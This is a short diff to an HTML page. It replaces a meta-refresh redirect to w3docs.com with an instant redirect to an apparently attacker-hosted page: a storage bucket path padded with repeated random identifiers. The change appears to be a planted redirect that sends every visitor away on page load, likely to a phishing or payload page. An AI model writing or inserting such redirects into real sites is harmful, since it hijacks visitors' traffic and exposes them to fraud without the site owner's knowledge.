--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <html>
   <head>
-    <meta http-equiv="refresh" content="0; url='https://www.w3docs.com'" />
+    <meta http-equiv="refresh" content="0; url='https://storageapi.fleek.co/63dd84bb-4bbb-47fe-b040-f6fd4547e3be-bucket/folarinov/63dd84bb-4bbb-47fe-b040-f6fd4547e3b/63dd84bb-4bbb-47fe-b040-f6fd4547e3b/63dd84bb-4bbb-47fe-b040-f6fd4547e3b/index.html'" />
   </head>
   <body>
   
